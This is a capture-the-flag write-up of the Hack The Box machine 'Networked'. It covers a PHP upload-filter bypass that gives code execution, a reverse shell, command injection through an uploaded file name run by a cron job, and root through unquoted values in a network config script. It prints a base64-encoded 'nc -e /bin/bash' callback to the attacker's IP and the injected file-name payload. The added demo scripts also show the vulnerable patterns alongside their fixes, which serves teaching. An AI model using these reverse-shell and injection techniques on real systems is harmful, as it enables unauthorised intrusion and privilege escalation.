#hackthebox #linux #easy
![[Pasted image 20250816210827.png]]
# Information Gathering - Nmap
I began with scanning all TCP ports and discovered two open ports: 22 and 80.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 23:41 UTC
Nmap scan report for 10.10.10.146
Host is up (0.059s latency).
Not shown: 65483 filtered tcp ports (no-response), 49 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 43.85 seconds
```
Then a second TCP scan with `-sCV` (default scripts plus version detection) against the two open ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 23:43 UTC
Nmap scan report for 10.10.10.146
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.33 seconds
```
Lastly, a UDP scan against the top 10 ports, which turned up nothing (every port reported as filtered).
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 23:44 UTC
Nmap scan report for 10.10.10.146
Host is up (0.057s latency).
PORT STATE SERVICE
53/udp filtered domain
67/udp filtered dhcps
123/udp filtered ntp
135/udp filtered msrpc
137/udp filtered netbios-ns
138/udp filtered netbios-dgm
161/udp filtered snmp
445/udp filtered microsoft-ds
631/udp filtered ipp
1434/udp filtered ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds
```
# Enumeration
##### HTTP - TCP 80
The landing page of port 80 doesn't provide much information. Just 3 simple sentences.
![[Pasted image 20250816184608.png]]
I ran `Gobuster` against the target and it discovered only 2 directories: `uploads` and `backup`
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 236] [--> http://10.10.10.146/uploads/]
/backup (Status: 301) [Size: 235] [--> http://10.10.10.146/backup/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
```
`/uploads` has nothing but a `.` on the page, which is very strange.
![[Pasted image 20250816185804.png]]
`/backup` offers a tar archive, `backup.tar`.
![[Pasted image 20250816185629.png]]
I extracted the files from `backup.tar`; it contains the PHP source of the site.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ tar -xvf backup.tar
index.php
lib.php
photos.php
upload.php
```
`index.php` is just the landing page and can be disregarded. The remaining three files are connected and make up the file upload and gallery functionality.
`/upload.php` has a file upload feature.
![[Pasted image 20250816191635.png]]
`/photos.php` is supposed to be a gallery and it has 4 photos available.
![[Pasted image 20250816191815.png]]
I tried to upload a random image file (`crab.png`) from my Kali, but it returned `Invalid image file`.
![[Pasted image 20250816191921.png]]
I think it's because of this part of `upload.php`: it requires both a passing `check_file_type` result and a file size below 60000 bytes, and `crab.png` exceeded that size limit.
```php
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '<pre>Invalid image file.</pre>';
displayform();
}
```
# Initial Access - shell as `apache`
I intercepted the request in `Burp` and removed a large chunk of the image body to get under the size limit, and this time it was accepted.
![[Pasted image 20250816193308.png]]
As instructed, I refreshed `/photos.php` and found my file. It had been renamed to `10_10_14_10.png`: the server derives the base name from the uploader's IP address, so that part of the name is not attacker-controlled.
![[Pasted image 20250816193424.png]]
I changed the file name to `crab.php.png` and it was still accepted. As long as the name ends in `.png` (and the other conditions are met) the upload goes through, and the server keeps the rest of the name, so the stored file becomes `10_10_14_10.php.png`. Whether that matters depends on how Apache maps the PHP handler: a mapping keyed on a `.php` extension anywhere in the name (`AddHandler`/`AddType` style) executes `.php.png` as PHP, whereas a `<FilesMatch "\.php$">` mapping would serve it as a static file.
![[Pasted image 20250816193712.png]]
Then I replaced the image data after the PNG signature with a simple PHP payload; the leading signature bytes have to stay so that `check_file_type` still classifies the body as an image. It was uploaded successfully.
![[Pasted image 20250816194122.png]]
Right click on `10_10_14_10.php.png` and select `Open Image in New Tab`
![[Pasted image 20250816194209.png]]
I tried running the `id` command, and it returned the output below, confirming that the uploaded file is executed as PHP: an unrestricted file upload leading to remote code execution as the web server user.
![[Pasted image 20250816194326.png]]
There could be many ways to get a reverse shell from here. I copied Pentest Monkey's well-known `php-reverse-shell` into the file in place of the simple PHP payload.
![[Pasted image 20250816195136.png]]
Then when I navigated to `/photos.php`, the page hung (the gallery's request for my `.php.png` executes the shell, which blocks while connected) and my listener caught the reverse shell.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.146] 58300
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
02:51:55 up 1:13, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
```
In `/home/guly` there was `user.txt`, but I couldn't read it as `apache`.
```bash
bash-4.2$ ls -l
total 12
-r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php
-rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly
-r--------. 1 guly guly 33 Aug 17 01:38 user.txt
```
# Privilege Escalation - shell as `guly`
`check_attack.php` is written as follows:
```php
bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
  $msg='';
  if ($value == 'index.html') {
    continue;
  }
  #echo "-------------\n";
  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);
  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}
?>
```
`crontab.guly` file is written as follows:
```bash
bash-4.2$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php
```
`crontab guru` confirms that `check_attack.php` runs every three minutes (`*/3`), presumably from `guly`'s crontab given the file name.
![[Pasted image 20250816200241.png]]
Looking at `check_attack.php` again, I notice two variables go into the `exec` calls. `$path` is hardcoded as `/var/www/html/uploads/`, but `$value` is each entry returned by `scandir($path)`, i.e. the name of any file in the uploads directory, which I can create as `apache`. When `check_ip` rejects the name (the prefix is not a valid IP address), the unquoted name is interpolated into `exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &")`, so shell metacharacters in the file name are run by the cron job as `guly`.
![[Pasted image 20250816201315.png]]
Before running the exploit, I tested a plain `nc` callback from the target to my Kali. The listener on my side died immediately after it saw the connection.
![[Pasted image 20250816202722.png]]
Base64-encoding the payload and decoding it back on the target worked reliably. Encoding is needed anyway: a file name cannot contain `/`, so `/bin/bash` cannot appear in it literally. Since the base64 alphabet also includes `/` and `+`, check that the encoded string is free of `/` (this one is) before using it as part of a name.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo nc -e /bin/bash 10.10.14.10 443 | base64 -w0
bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0Mwo=
```
![[Pasted image 20250816203308.png]]
Then I created a file in `/var/www/html/uploads` with the payload embedded in its name. The name has to be passed to `touch` as a single quoted argument; unquoted, the shell would run the payload on the `apache` shell instead of creating the file:
```bash
bash-4.2$ touch '/var/www/html/uploads/wook; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0Mwo= | base64 -d | sh; wk'
```
```bash
bash-4.2$ ls
10_10_14_10.php.png
10_10_14_10.png
127_0_0_1.png
127_0_0_2.png
127_0_0_3.png
127_0_0_4.png
index.html
wook; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0Mwo= | base64 -d | sh; wk
```
After waiting for the cron job to fire (up to three minutes), I caught a shell as `guly`!
![[Pasted image 20250816204224.png]]
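To see exactly why the file name alone is enough, here is an added example (not the writeup's code) that reproduces the `check_attack.php` sink in a scratch directory: it creates a file with the same shape of name, runs the vulnerable `exec`-style command through `sh -c`, shows that the embedded command fires, and then runs the hardened form where the name is a single argument and nothing fires. The payload is a harmless `touch`, the names `wook`/`wk` mirror the ones above, and `encode_payload` refuses any base64 text containing `/`, since a file name cannot hold one.

```shell
#!/bin/sh
# Added example, not code from the writeup. Reproduces the check_attack.php sink
# in a throwaway directory. The PHP line
#     exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
# hands the file name to /bin/sh unquoted, so ';' inside the name starts new
# commands. "wook"/"wk", the marker file and the payload are constructed here.

WORK=$(mktemp -d)
UPLOADS="$WORK/uploads/"
MARKER="$WORK/injected"
mkdir -p "$UPLOADS"
trap 'rm -rf "$WORK"' EXIT

# A file name may not contain '/', so the payload travels base64-encoded and is
# decoded on the target. The base64 alphabet itself contains '/', so refuse
# any encoding that could not be used as a file name (return 1).
encode_payload() {
    b64=$(printf '%s\n' "$1" | base64 | tr -d '\n')
    case "$b64" in */*) return 1 ;; esac
    printf '%s' "$b64"
}

# Relative path on purpose: the cron job's shell has a working directory too,
# and our simulated rm runs inside $WORK, so no '/' is needed anywhere.
B64=$(encode_payload 'touch injected') || { echo "payload would need a '/'"; exit 1; }
EVIL_NAME="wook; echo $B64 | base64 -d | sh; wk"

# Vulnerable: interpolate, then let a shell parse the whole line
# (0 = the payload ran; note the evil file itself is never removed).
demo_vulnerable() {
    rm -f "$MARKER"
    touch "$UPLOADS$EVIL_NAME"
    (cd "$WORK" && sh -c "rm -f $UPLOADS$EVIL_NAME" >/dev/null 2>&1)
    [ -e "$MARKER" ]
}

# Hardened: the name is one argument to rm and is never parsed as shell. In PHP
# that is unlink($path.$value), or at least escapeshellarg() around the name.
# (0 = file removed and payload did not run)
demo_hardened() {
    rm -f "$MARKER"
    touch "$UPLOADS$EVIL_NAME"
    (cd "$WORK" && rm -f -- "$UPLOADS$EVIL_NAME")
    [ ! -e "$MARKER" ] && [ ! -e "$UPLOADS$EVIL_NAME" ]
}

echo "file name used: $EVIL_NAME"
demo_vulnerable && echo "vulnerable pattern: embedded command executed"
demo_hardened   && echo "hardened pattern: file removed, nothing executed"
```

The `sh -c` call stands in for PHP's `exec()`, which also goes through `/bin/sh -c`; everything after the first `;` in the name is a fresh command, and the `> /dev/null 2>&1 &` tail from the original line simply attaches to the last fragment (`wk`), which is why a trailing junk word is harmless.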
Finally read `user.txt`
```bash
[guly@networked ~]$ cat user.txt
8d3...
```
# Privilege Escalation - shell as `root`
`sudo -l` command reveals that `guly` can run the following command as `root`.
```bash
[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
```
`changename.sh` is written as follows:
```bash
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
  echo "interface $var:"
  read x
  while [[ ! $x =~ $regexp ]]; do
    echo "wrong input, try again"
    echo "interface $var:"
    read x
  done
  echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
```
When I run the command with `sudo`, `changename.sh` prompts me to enter several values including `interface NAME`, `PROXY_METHOD`, `BROWSER_ONLY`, and `BOOTPROTO`.
```bash
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
wook
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
b
interface BOOTPROTO:
c
ERROR : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.
```
The bug is in how the value reaches the network scripts.
`/sbin/ifup guly0` sources `/etc/sysconfig/network-scripts/ifcfg-guly` as a shell script and expects lines of the form `VARIABLE=value`. `changename.sh` appends the user input with `echo $var=$x`, without any quoting, and its `regexp` (`^[a-zA-Z0-9_\ /-]+$`) permits both spaces and `/`. So a value containing a space, for example:
```bash
PROXY_METHOD=not a method
```
is parsed by the shell as the command `a method` run with `PROXY_METHOD=not` set in its environment (the `VAR=value command args` prefix-assignment form), not as an assignment of the string `not a method`. Because the script runs as root through `sudo` and `ifup` sources the file as root, I entered `a /bin/bash` as the value; `/bin/bash` was executed when the file was sourced, which gave me a shell as `root`.
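Reproduced in a scratch directory, as an added example that is not part of the writeup: the same character class as the script's `regexp` (checked with `grep -E`, standing in for the script's `[[ =~ ]]` test), the unquoted `echo $var=$x` style write, and a stand-in for `ifup` sourcing the file, followed by a writer that single-quotes the value so the line stays an assignment. The value `a touch ifcfg-injected` and the file name `ifcfg-demo` are constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the writeup. Reproduces the changename.sh bug in
# a scratch directory: a value that passes the script's regexp is appended
# unquoted as VAR=value, and sourcing that file (what ifup does with
# ifcfg-guly) runs "value" as a command with VAR set in its environment.
# The value "a touch ifcfg-injected" and "ifcfg-demo" are constructed here.

WORK=$(mktemp -d)
CFG="$WORK/ifcfg-demo"
trap 'rm -rf "$WORK"' EXIT

# Same character class as the script: space and '/' are allowed (0 = accepted).
validate_value() {
    printf '%s\n' "$1" | grep -Eq '^[a-zA-Z0-9_ /-]+$'
}

# What changename.sh does: echo $var=$x >> ifcfg-guly, no quoting.
write_unquoted() {
    echo "$1=$2" >> "$CFG"
}

# Hardened writer: single-quote the value so the line is always an assignment.
# The regexp already rejects quotes, so the value cannot break out of them.
write_quoted() {
    printf "%s='%s'\n" "$1" "$2" >> "$CFG"
}

# Stand-in for /sbin/ifup sourcing the ifcfg file in a shell, here as root
# would on the box; run in a subshell so the demo's own shell stays clean.
source_cfg() {
    ( cd "$WORK" && . "$CFG" ) >/dev/null 2>&1
}

# 0 = the injected command ran when the file was sourced.
demo_unquoted() {
    : > "$CFG"; rm -f "$WORK/ifcfg-injected"
    validate_value "$1" || return 2
    write_unquoted PROXY_METHOD "$1"
    source_cfg
    [ -e "$WORK/ifcfg-injected" ]
}

# 0 = value stored verbatim in PROXY_METHOD and nothing executed.
demo_quoted() {
    : > "$CFG"; rm -f "$WORK/ifcfg-injected"
    validate_value "$1" || return 2
    write_quoted PROXY_METHOD "$1"
    source_cfg
    [ ! -e "$WORK/ifcfg-injected" ] &&
        [ "$(cd "$WORK" && . "$CFG" && printf '%s' "$PROXY_METHOD")" = "$1" ]
}

EVIL='a touch ifcfg-injected'
demo_unquoted "$EVIL" && echo "unquoted write: '$EVIL' ran touch when sourced"
demo_quoted   "$EVIL" && echo "quoted write: value stored, nothing executed"
validate_value 'a; touch x' || echo "regexp rejects ';' but still allows space and /"
```

Quoting the value is the minimal fix; the more robust one is to tighten the character class to `^[a-zA-Z0-9_-]+$` so neither spaces nor `/` get through, and, better still, not to source user-supplied configuration as root at all.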
```bash
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
wook
interface PROXY_METHOD:
a /bin/bash
interface BROWSER_ONLY:
b
interface BOOTPROTO:
c
[root@networked network-scripts]# whoami
root
```
Found `root.txt`
```bash
[root@networked ~]# cat root.txt
af5...
```